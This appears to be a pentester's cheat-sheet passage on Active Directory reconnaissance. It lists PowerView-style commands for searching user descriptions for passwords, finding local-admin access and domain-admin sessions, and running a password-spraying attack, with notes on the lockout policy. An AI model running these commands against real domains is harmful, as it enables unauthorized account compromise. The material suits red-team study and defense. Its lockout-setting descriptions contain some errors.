USER HUNTING
HUNTING JUICY NOTE
Find-UserField -SearchField Description -SearchTerm "pass"
Find-UserField -SearchField Description -SearchTerm "admin"
Find-UserField -SearchField Description -SearchTerm "manage"
...
HUNTING ADMIN ACCESS
- Find all machines on the current domain where the current user has local admin access (Get-NetComputer + Invoke-CheckLocalAdminAccess)
HUNTING PSREMOTE ACCESS
- Find Administrative access
HUNTING WMI ACCESS
- If RPC and SMB are blocked check with WMI
HUNTING ADMIN
- Find local admins on all machines of the domain (Get-NetComputer+Get- NetLocalGroup)
HUNTING SESSION
- Find computers where a domain admin (or specified user/group) has sessions
- Confirm admin access
HUNTING DOMAIN ADMIN
- Find computers where a domain admin is logged-in ( Get-NetSession / Get-NetLoggedon )
- WAIT FOR INCOMING SESSINON
PASSWORD SPRAYING
# CHECK POLICY AND CARE TO NOT LOCK ACCOUNTS
(Get-DomainPolicy)."system access"
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
:warning: VERY NOISY
| Setting Key | Explaination |
|---|---|
| LockoutDuration | The number of minutes that a locked-out account MUST remain locked out before automatically becoming unlocked. -1 = MUST be unclock by admin other = number of minutes |
| LockoutBadCount | Number of failed logon attempts after which a user account MUST be locked out. |
| ResetLockoutCount | Number of minutes after a failed logon attempt that the account MUST be locked out |
PWDLASTSET
- Use this command to see the last password set of each user in the current domain